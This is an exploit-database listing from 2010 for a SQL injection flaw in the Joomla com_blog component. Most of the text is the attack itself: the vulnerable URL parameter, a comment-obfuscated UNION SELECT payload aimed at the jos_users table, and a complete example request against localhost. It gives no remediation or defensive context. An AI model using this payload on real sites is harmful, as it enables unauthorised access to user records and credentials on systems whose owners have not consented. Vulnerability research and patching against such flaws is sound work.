Joomla Component com_blog SQL Injection Vulnerability

2010-03-11T00:00:00
ID 1337DAY-ID-11266
Type zdt
Reporter DevilZ TM
Modified 2010-03-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Joomla Component com_blog SQL Injection Vulnerability
=====================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*



#  0day.today [2018-01-03]  #